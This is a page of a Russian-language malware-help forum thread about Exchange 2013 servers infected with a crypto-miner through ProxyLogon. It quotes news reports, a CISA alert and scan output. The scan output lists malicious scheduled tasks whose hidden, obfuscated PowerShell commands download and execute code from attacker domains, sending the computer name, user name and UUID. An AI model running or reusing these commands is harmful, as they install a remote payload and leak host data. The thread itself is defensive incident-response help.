[ Закрыто ] запуск майнера на серверах с MS Exchange 2013 , ProxyLogon

RSS

Сообщений: 148

Баллов: 118

Регистрация: 25.03.2011

Размещено 17.03.2021 16:49:30

Здравствуйте. MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. Удалять сам не стал из "шидулера", реестра. Обновления на двух серверах уже установили, закрывающую уязвимость. Если будут еще какие то комментарии напишите пожалуйста.
Положу сюда сразу два образа двух серверов. Если необходимо могу тему скопировать, по одному образу выложу.

Прикрепленные файлы

SPHVMAIL01_2021-03-17_16-33-37_v4.11.6.7z (754.89 КБ)

Изменено: Владимир Шариков - 12.11.2021 17:24:19

Ответы

Пред. 1 2 3

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 18.03.2021 04:53:31

Цитата
santy написал: [QUOTE] Владимир Шариков написал: Что этот код делает? Стоит ли боятся "Последствий" этой бяки?

я думаю стоит. эксплойт для ProxyLogon, по словам исследователей, мог использоваться в теч двух месяцев, до выхода мартовского обновления от Microsoft. (Возможно, была утечка эксплойта через поставщиков ПО, которые имеют ранний доступ к полученным сообщениям от исследователей)

Цитата
После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта. ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все. Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware. В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.

Цитата

После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта.

ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все.

Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware.

В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.

Цитата
Вице-президент Mandiant по анализу, Джон Халтквист, ожидает, что в ближайшее время банды вымогателей будут еще больше использовать уязвимости ProxyLogon, которые могут найти вектор атаки «особенно привлекательным», поскольку он является «эффективным средством получения доступа администратора домена». «Этот доступ позволяет им развертывать шифрование на предприятии. В случаях, когда организации не исправлены, эти уязвимости предоставят преступникам более быстрый путь к успеху », - Джон Халтквист.

Цитата

Вице-президент Mandiant по анализу, Джон Халтквист, ожидает, что в ближайшее время банды вымогателей будут еще больше использовать уязвимости ProxyLogon, которые могут найти вектор атаки «особенно привлекательным», поскольку он является «эффективным средством получения доступа администратора домена».

«Этот доступ позволяет им развертывать шифрование на предприятии. В случаях, когда организации не исправлены, эти уязвимости предоставят преступникам более быстрый путь к успеху », - Джон Халтквист.

более подробно, здесь
https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/

[ Как создать образ автозапуска? ]

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 18.03.2021 07:27:19

задачи, которые были запущены через powershell(Имя компьютера: SPHVMAIL01), проверьте так же наличие новых учетных записей в домене.

Цитата
Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Имя файла POWERSHELL.EXE Цифр. подпись Действительна, подписано Microsoft Windows Оригинальное имя PowerShell.EXE.MUI Версия файла 6.3.9600.17396 (winblue_r4.141007-2030) Описание Windows PowerShell Производитель Microsoft Corporation Доп. информация на момент обновления списка CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')))) CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')) CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')) CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')))) CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')) CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')))) SHA1 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B MD5 C031E215B8B08C752BF362F6D4C5D3AD Ссылки на объект Ссылка C:\WINDOWS\SYSTEM32\TASKS\A5TORJ3ZT Ссылка C:\WINDOWS\SYSTEM32\TASKS\AVCZOHW Ссылка C:\WINDOWS\SYSTEM32\TASKS\JCA9PD Ссылка C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\eUuwdKQkPqT\SMYVSZY4OWX Ссылка C:\WINDOWS\SYSTEM32\TASKS\O6YM9I Ссылка C:\WINDOWS\SYSTEM32\TASKS\Xnqm40cRo\ZUPKUTWN

Цитата

Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
Имя файла POWERSHELL.EXE

Цифр. подпись Действительна, подписано Microsoft Windows

Оригинальное имя PowerShell.EXE.MUI
Версия файла 6.3.9600.17396 (winblue_r4.141007-2030)
Описание Windows PowerShell
Производитель Microsoft Corporation

Доп. информация на момент обновления списка
CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
SHA1 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B
MD5 C031E215B8B08C752BF362F6D4C5D3AD

Ссылки на объект
Ссылка C:\WINDOWS\SYSTEM32\TASKS\A5TORJ3ZT

Ссылка C:\WINDOWS\SYSTEM32\TASKS\AVCZOHW

Ссылка C:\WINDOWS\SYSTEM32\TASKS\JCA9PD

Ссылка C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\eUuwdKQkPqT\SMYVSZY4OWX

Ссылка C:\WINDOWS\SYSTEM32\TASKS\O6YM9I

Ссылка C:\WINDOWS\SYSTEM32\TASKS\Xnqm40cRo\ZUPKUTWN

[ Как создать образ автозапуска? ]

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 18.03.2021 16:49:17

Устранение уязвимостей Microsoft Exchange Server

Цитата
Партнеры по кибербезопасности и безопасности инфраструктуры (CISA) наблюдали активное использование уязвимостей в продуктах Microsoft Exchange Server. Успешное использование этих уязвимостей позволяет злоумышленнику, не прошедшему проверку подлинности, выполнить произвольный код на уязвимых серверах Exchange Server, что позволяет злоумышленнику получить постоянный доступ к системе, а также доступ к файлам и почтовым ящикам на сервере и учетным данным, хранящимся в этой системе. Успешная эксплуатация может дополнительно позволить злоумышленнику нарушить доверие и идентификацию в уязвимой сети. Microsoft выпустила внеполосные патчи для устранения уязвимостей в Microsoft Exchange Server. Уязвимости влияют на локальные серверы Microsoft Exchange и, как известно, не влияют на облачные почтовые службы Exchange Online или Microsoft 365 (ранее O365). Это предупреждение включает в себя как тактику, методы и процедуры (TTP), так и индикаторы компрометации (IOC), связанные с этой злонамеренной деятельностью. Чтобы обезопасить себя от этой угрозы, CISA рекомендует организациям проверять свои системы на предмет наличия TTP и использовать IOC для обнаружения любых вредоносных действий. Если организация обнаруживает действия по эксплуатации, она должна предположить компрометацию сетевой идентичности и следовать процедурам реагирования на инциденты. Если организация не обнаруживает активности, она должна немедленно применить доступные исправления и реализовать меры по снижению риска, указанные в этом предупреждении.

Цитата

Партнеры по кибербезопасности и безопасности инфраструктуры (CISA) наблюдали активное использование уязвимостей в продуктах Microsoft Exchange Server. Успешное использование этих уязвимостей позволяет злоумышленнику, не прошедшему проверку подлинности, выполнить произвольный код на уязвимых серверах Exchange Server, что позволяет злоумышленнику получить постоянный доступ к системе, а также доступ к файлам и почтовым ящикам на сервере и учетным данным, хранящимся в этой системе. Успешная эксплуатация может дополнительно позволить злоумышленнику нарушить доверие и идентификацию в уязвимой сети. Microsoft выпустила внеполосные патчи для устранения уязвимостей в Microsoft Exchange Server. Уязвимости влияют на локальные серверы Microsoft Exchange и, как известно, не влияют на облачные почтовые службы Exchange Online или Microsoft 365 (ранее O365).

Это предупреждение включает в себя как тактику, методы и процедуры (TTP), так и индикаторы компрометации (IOC), связанные с этой злонамеренной деятельностью. Чтобы обезопасить себя от этой угрозы, CISA рекомендует организациям проверять свои системы на предмет наличия TTP и использовать IOC для обнаружения любых вредоносных действий. Если организация обнаруживает действия по эксплуатации, она должна предположить компрометацию сетевой идентичности и следовать процедурам реагирования на инциденты. Если организация не обнаруживает активности, она должна немедленно применить доступные исправления и реализовать меры по снижению риска, указанные в этом предупреждении.

подробнее здесь:
https://us-cert.cisa.gov/ncas/alerts/aa21-062a

[ Как создать образ автозапуска? ]

Пред. 1 2 3